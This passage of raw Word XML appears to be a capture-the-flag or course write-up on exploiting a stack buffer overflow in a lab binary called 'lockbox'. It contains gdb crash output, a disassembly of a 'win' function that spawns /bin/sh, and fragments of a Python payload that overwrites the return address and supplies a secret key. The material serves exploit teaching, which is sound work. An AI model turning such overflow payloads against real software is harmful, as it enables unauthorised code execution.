              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    RSP:       0x7ffc6b467de8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BEF6ABC" w14:textId="77777777" w:rsidR="00844825" w:rsidRDefault="00844825" w:rsidP="00844825">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    Exe:       '/home/kali/Desktop/4-Week/lockbox' (0x400000)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6ADE8151" w14:textId="77777777" w:rsidR="00844825" w:rsidRDefault="00844825" w:rsidP="00844825">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    Fault:     0x4242424242424242</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E239E69" w14:textId="7513E427" w:rsidR="001D6E6B" w:rsidRDefault="00844825" w:rsidP="00844825">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">[*] </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>rsp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = 0x7ffc6b467de8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3C538C2C" w14:textId="6B6C0209" w:rsidR="00DB49B6" w:rsidRDefault="00844825" w:rsidP="00844825">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>New Segmentation Error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3554B7" w14:textId="2C222235" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DB49B6">
      <w:r>
        <w:t xml:space="preserve">The address stored in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00844825">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>rip</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> register</w:t>
      </w:r>
      <w:r w:rsidR="00844825">
        <w:t xml:space="preserve"> after the crash</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is the </w:t>
      </w:r>
      <w:r w:rsidRPr="00844825">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>ret</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> operation in </w:t>
      </w:r>
      <w:r w:rsidRPr="00844825">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>wi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825" w14:paraId="0CAD9F31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80C6A2E" w14:textId="77777777" w:rsidR="00844825" w:rsidRDefault="00844825" w:rsidP="00844825">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">(gdb) $ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>disas</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>win</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="6F5252D4" w14:textId="77777777" w:rsidR="00844825" w:rsidRDefault="00844825" w:rsidP="00844825">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>Dump of assembler code for function win:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44409357" w14:textId="77777777" w:rsidR="00844825" w:rsidRDefault="00844825" w:rsidP="00844825">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">   0x00000000004011b6 &lt;+0&gt;:    endbr64</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C61420D" w14:textId="77777777" w:rsidR="00844825" w:rsidRDefault="00844825" w:rsidP="00844825">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">   0x00000000004011ba &lt;+4&gt;:    push   %</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>rbp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="3A2FD792" w14:textId="77777777" w:rsidR="00844825" w:rsidRDefault="00844825" w:rsidP="00844825">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">   0x00000000004011bb &lt;+5&gt;:    mov    %</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>rsp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>,%</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>rbp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="586DD6C7" w14:textId="77777777" w:rsidR="00844825" w:rsidRDefault="00844825" w:rsidP="00844825">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">   0x00000000004011be &lt;+8&gt;:    mov    $0xfffffffffffffff</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>0,%</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>rax</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08D568DD" w14:textId="77777777" w:rsidR="00844825" w:rsidRDefault="00844825" w:rsidP="00844825">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">   0x00000000004011c5 &lt;+15&gt;:    and    %</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>rax</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>,%</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>rsp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="7E248E38" w14:textId="32FB79C0" w:rsidR="00844825" w:rsidRDefault="00844825" w:rsidP="00844825">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">   0x00000000004011c8 &lt;+18&gt;:    mov    0x2e82(%rip</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>),%</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>eax</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">      # 0x404050 &lt;key&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B70F36D" w14:textId="77777777" w:rsidR="00844825" w:rsidRDefault="00844825" w:rsidP="00844825">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">   0x00000000004011ce &lt;+24&gt;:    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">    $0xdaddb0</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>dd,%</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>eax</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17378AD2" w14:textId="77777777" w:rsidR="00844825" w:rsidRDefault="00844825" w:rsidP="00844825">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">   0x00000000004011d3 &lt;+29&gt;:    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>jne</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">    0x4011e6 &lt;win+48&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48D5552F" w14:textId="77777777" w:rsidR="00844825" w:rsidRDefault="00844825" w:rsidP="00844825">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">   0x00000000004011d5 &lt;+31&gt;:    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>movabs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> $0x68732f6e69622</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>f,%</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>rax</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B31BD13" w14:textId="386542FB" w:rsidR="00844825" w:rsidRDefault="00844825" w:rsidP="00844825">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">   0x00000000004011df &lt;+41&gt;:    mov    %rax,0x2e7a(%</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t xml:space="preserve">rip)   </w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">   # 0x404060 &lt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>mystring</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E2F42F0" w14:textId="3D59B21E" w:rsidR="00844825" w:rsidRDefault="00844825" w:rsidP="00844825">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">   0x00000000004011e6 &lt;+48&gt;:    lea    0x2e73(%rip</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>),%</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>rax</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">      # 0x404060 &lt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>mystring</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7627E480" w14:textId="77777777" w:rsidR="00844825" w:rsidRDefault="00844825" w:rsidP="00844825">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">   0x00000000004011ed &lt;+55&gt;:    mov    %</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>rax</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>,%</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>rdi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="7375F151" w14:textId="77777777" w:rsidR="00844825" w:rsidRDefault="00844825" w:rsidP="00844825">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">   0x00000000004011f0 &lt;+58&gt;:    call   0x401090 &lt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>system@plt</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0EB7A325" w14:textId="77777777" w:rsidR="00844825" w:rsidRDefault="00844825" w:rsidP="00844825">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">   0x00000000004011f5 &lt;+63&gt;:    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>nop</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="35FA7984" w14:textId="77777777" w:rsidR="00844825" w:rsidRDefault="00844825" w:rsidP="00844825">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">   0x00000000004011f6 &lt;+64&gt;:    pop    %</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>rbp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="08B7C282" w14:textId="651483D5" w:rsidR="00844825" w:rsidRDefault="00844825" w:rsidP="00844825">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t>=&gt; 0x00000000004011f7 &lt;+65&gt;:    ret</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="76DE7CA1" w14:textId="4CD5B24F" w:rsidR="00DB49B6" w:rsidRDefault="00844825" w:rsidP="00844825">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Win Disassembly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50602B1E" w14:textId="77777777" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DB49B6">
      <w:r>
        <w:t xml:space="preserve">This shows that the new payload did successfully cause </w:t>
      </w:r>
      <w:r w:rsidRPr="00844825">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>lockbox</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to run the </w:t>
      </w:r>
      <w:r w:rsidRPr="00844825">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>win</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> function before crashing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1462F6D7" w14:textId="77777777" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DB49B6"/>
    <w:p w14:paraId="33A460E3" w14:textId="77777777" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DB49B6">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00844825">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>win</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> function compares </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00844825">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to a secret value, </w:t>
      </w:r>
      <w:r w:rsidRPr="00844825">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>0xdaddb0dd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. If the values are equal, the value stored in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00844825">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>mystring</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is set to </w:t>
      </w:r>
      <w:r w:rsidRPr="00844825">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00844825">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, giving the user a shell when </w:t>
      </w:r>
      <w:r w:rsidRPr="00844825">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>system</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is called. With the current payload, the value of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00844825">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> register is overwritten by the payload padding, which causes the comparison to f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825" w14:paraId="259C291F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0F0EE7E7" w14:textId="77777777" w:rsidR="00844825" w:rsidRDefault="00844825" w:rsidP="00844825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49E34B14" w14:textId="16832AAB" w:rsidR="00844825" w:rsidRDefault="00844825" w:rsidP="00844825">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>└─$ python3 Lockbox_Pwn.py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FC42704" w14:textId="77777777" w:rsidR="00844825" w:rsidRDefault="00844825" w:rsidP="00844825">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="13199BBF" w14:textId="77777777" w:rsidR="00844825" w:rsidRDefault="00844825" w:rsidP="00844825">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">[*] Switching to interactive </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>mode</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="5878B950" w14:textId="77777777" w:rsidR="00844825" w:rsidRDefault="00844825" w:rsidP="00844825">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>Breakpoint 1, 0x00000000004011ce in win ()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A6A247B" w14:textId="77777777" w:rsidR="00844825" w:rsidRDefault="00844825" w:rsidP="00844825">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">(gdb) $ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>disas</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>win</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="4506442C" w14:textId="77777777" w:rsidR="00844825" w:rsidRDefault="00844825" w:rsidP="00844825">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>Dump of assembler code for function win:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F731477" w14:textId="3829E899" w:rsidR="00844825" w:rsidRDefault="00844825" w:rsidP="00844825">
            <w:pPr>
              <w:pStyle w:val="omittedforbrevity"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    ...omitted for brevity...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CE51622" w14:textId="77777777" w:rsidR="00844825" w:rsidRDefault="00844825" w:rsidP="00844825">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">   0x00000000004011c8 &lt;+18&gt;:    mov    0x2e82(%rip</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>),%</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>eax</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">        # 0x404050 &lt;key&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B8EE0C1" w14:textId="77777777" w:rsidR="00844825" w:rsidRDefault="00844825" w:rsidP="00844825">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">=&gt; 0x00000000004011ce &lt;+24&gt;:    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">    $0xdaddb0</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>dd,%</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>eax</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6351341D" w14:textId="77777777" w:rsidR="00844825" w:rsidRDefault="00844825" w:rsidP="00844825">
            <w:pPr>
              <w:pStyle w:val="omittedforbrevity"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">   ...omitted for brevity...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D491ADF" w14:textId="77777777" w:rsidR="00844825" w:rsidRDefault="00844825" w:rsidP="00844825">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">   0x00000000004011f7 &lt;+65&gt;:    ret</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3898AACA" w14:textId="77777777" w:rsidR="00844825" w:rsidRDefault="00844825" w:rsidP="00844825">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>End of assembler dump.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53DCCFB0" w14:textId="77777777" w:rsidR="00844825" w:rsidRDefault="00844825" w:rsidP="00844825">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">(gdb) $ info registers </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>eax</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="7A979E2D" w14:textId="591877A4" w:rsidR="00844825" w:rsidRDefault="00844825" w:rsidP="00844825">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00844825">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>eax</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00844825">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t xml:space="preserve">            0x61616161</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">          1633771873</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="72DAF7DB" w14:textId="4108B2AC" w:rsidR="00DB49B6" w:rsidRDefault="00844825" w:rsidP="00844825">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Win Disassembly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55638292" w14:textId="25830AF8" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DB49B6">
      <w:r>
        <w:t xml:space="preserve">The first four characters of padding data overwrite the value of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00844825">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. By changing the payload so that the </w:t>
      </w:r>
      <w:r w:rsidR="00844825">
        <w:t>secret</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> value is placed after the key, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00844825">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> should be overwritten with the correct val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825" w14:paraId="4E6407A9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5DA9BE5" w14:textId="77777777" w:rsidR="00844825" w:rsidRDefault="00844825" w:rsidP="00844825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secretPayload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3E9B95FB" w14:textId="77777777" w:rsidR="00844825" w:rsidRDefault="00844825" w:rsidP="00844825">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve">pad16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41) for </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> in range(0,16)])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BBE0402" w14:textId="77777777" w:rsidR="00150680" w:rsidRDefault="00844825" w:rsidP="00844825">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>keyAddr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">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50), </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>struct.pack</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>("B", 0x40),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71D58656" w14:textId="051A5016" w:rsidR="00844825" w:rsidRDefault="00150680" w:rsidP="00844825">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">       </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00844825">
              <w:t>struct.pack</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00844825">
              <w:t xml:space="preserve">("B", 0x40), </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00844825">
              <w:t>struct.pack</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00844825">
              <w:t>("B", 0x00)])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="278F8E60" w14:textId="77777777" w:rsidR="00844825" w:rsidRDefault="00844825" w:rsidP="00844825">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve">pad0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00) for </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> in range(0,4)])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60E663C2" w14:textId="77777777" w:rsidR="00150680" w:rsidRDefault="00844825" w:rsidP="00844825">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve">secret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dd), </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>struct.pack</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>("B", 0xb0),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4955B98A" w14:textId="3C2B2287" w:rsidR="00844825" w:rsidRDefault="00150680" w:rsidP="00844825">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">              </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00844825">
              <w:t>struct.pack</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00844825">
              <w:t xml:space="preserve">("B", 0xdd), </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00844825">
              <w:t>struct.pack</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00844825">
              <w:t>("B", 0xda)])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78BBB39A" w14:textId="77777777" w:rsidR="00844825" w:rsidRDefault="00844825" w:rsidP="00844825">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve">pad44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42) for </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> in range(0,44)])</w:t>
            </w:r>
          </w:p>
